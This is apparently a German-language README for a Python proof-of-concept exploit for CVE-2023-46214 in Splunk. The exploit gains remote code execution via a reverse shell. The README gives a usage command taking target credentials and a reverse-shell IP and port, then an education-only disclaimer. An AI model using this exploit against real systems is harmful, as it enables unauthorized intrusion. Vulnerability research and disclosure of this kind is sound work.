
Python-basierter PoC für CVE-2023-46214, der Splunks adddatamethods-Funktion ausnutzt, um über eine Reverse Shell Remote-Code-Ausführung zu erreichen.
Proof-of-Concept-Exploit für CVE-2023-46214, SVD-2023-1104

Die URL der Splunk-Instanz, Benutzername, Passwort, Reverse-Shell-IP und Port werden alle als Befehlszeilenparameter benötigt. Zum Beispiel:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
Ich habe einen Blogbeitrag geschrieben, der die Methodik beschreibt, mit der diese Schwachstelle aufgedeckt wurde. Wenn Sie auf Probleme mit dem Skript stoßen, könnte der Blog hilfreich sein, da er die manuellen Schritte zur Ausnutzung beschreibt.
Das in diesem Repository bereitgestellte Proof-of-Concept-Skript (PoC) dient ausschließlich Bildungs- und Forschungszwecken. Sein Zweck ist es, eine bestimmte Schwachstelle zu veranschaulichen und zum Verständnis der damit verbundenen Sicherheitsrisiken beizutragen.
Jegliche Verwendung dieses Skripts für unbefugte Aktivitäten, einschließlich, aber nicht beschränkt auf unbefugten Systemzugriff, unbefugte Tests oder andere Formen des Missbrauchs, ist ausdrücklich untersagt.
Die Ersteller und Mitwirkenden dieses Repositorys lehnen jegliche Haftung für die unsachgemäße Verwendung oder für Schäden oder Verletzungen ab, die aus der Nutzung dieses Skripts entstehen. Durch die Nutzung dieses Skripts erklären Sie sich damit einverstanden, es in verantwortungsvoller Weise und auf eigenes Risiko zu verwenden.